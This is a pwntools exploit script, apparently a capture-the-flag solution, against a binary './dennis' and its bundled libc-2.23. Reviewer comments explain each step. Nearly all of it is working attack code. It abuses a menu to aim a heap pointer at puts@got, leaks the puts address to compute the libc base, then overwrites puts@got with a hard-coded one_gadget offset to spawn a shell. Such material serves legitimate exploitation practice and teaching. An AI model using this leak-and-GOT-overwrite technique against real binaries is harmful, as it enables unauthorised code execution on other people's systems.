# pwntools driver for the CTF binary ./dennis against its bundled libc-2.23.so.
# The target exposes a numbered menu; every prompt ends in ': ', and the script
# is one strict request/response sequence, so statement order is load-bearing.
#
# Review notes (what the script visibly depends on, for anyone assessing it):
#   - puts@got is both read (leak) and later overwritten (option 4 below), so
#     the binary must have a writable GOT; Full RELRO would make that write
#     fault and break the last step.
#   - 0x3a61c is hard-coded for this exact libc-2.23.so build (presumably a
#     one_gadget-style offset); it is not portable to any other libc file.
#   - p.interactive() is called twice; the first one sits before the GOT
#     overwrite and looks like a debugging stop — see the note at that line.
from pwn import *
libc = ELF('./libc-2.23.so')
e = ELF('./dennis')
# p = process('./dennis')
context.terminal = ['termite', '-e']
# Launches under gdb (the plain process() launch above is commented out);
# context.terminal only matters for this gdb.debug() call.
p = gdb.debug('./dennis')
# Consume the first menu prompt before sending anything.
p.recvuntil(': ')
# malloc to initialize spm struct on the heap
p.sendline('1')
p.recvuntil(': ')
p.sendline('0')
p.recvuntil(': ')
# write into spm struct
#
# static struct spm {
# struct spm *spm; -> puts@got
# struct spm *spmm; -> spm symbol
# } *spm;
p.sendline('4')
p.recvuntil(': ')
# Two packed 32-bit pointers: the GOT slot of puts, then the address of the
# static `spm` pointer itself (both resolved from the ELF, so the binary is
# assumed non-PIE here — the script never leaks a base for ./dennis).
p.sendline(p32(e.got['puts'])+p32(e.symbols['spm']))
p.recvuntil(': ')
# dereference puts@got by modifying spm symbol to point to puts@got
p.sendline('3')
p.recvuntil(': ')
# read first 4 bytes of spm that points to puts@got to leak puts libc address
p.sendline('2')
p.recvuntil(': ')
p.sendline('4')
# The binary echoes the 4-byte field; u32 turns it into the resolved puts
# address, and the libc symbol table gives the load base.
puts = u32(p.recv(4))
log.info(hex(puts))
libc_base = puts - libc.symbols['puts']
one_gadget = libc_base + 0x3a61c
p.recvuntil(': ')
# NOTE(review): this interactive() blocks before the GOT overwrite; the steps
# below only run once the interactive session is closed. Looks like a leftover
# debugging stop rather than intended flow — confirm before relying on it.
p.interactive()
# write one_gadget to puts@got
p.sendline('4')
p.recvuntil(': ')
# Only the first field is rewritten here; the second field (spm symbol
# address) is left as set earlier.
p.sendline(p32(one_gadget))
p.recvuntil(': ')
# any input to cause a puts call
p.sendline('0wn3d')
p.interactive()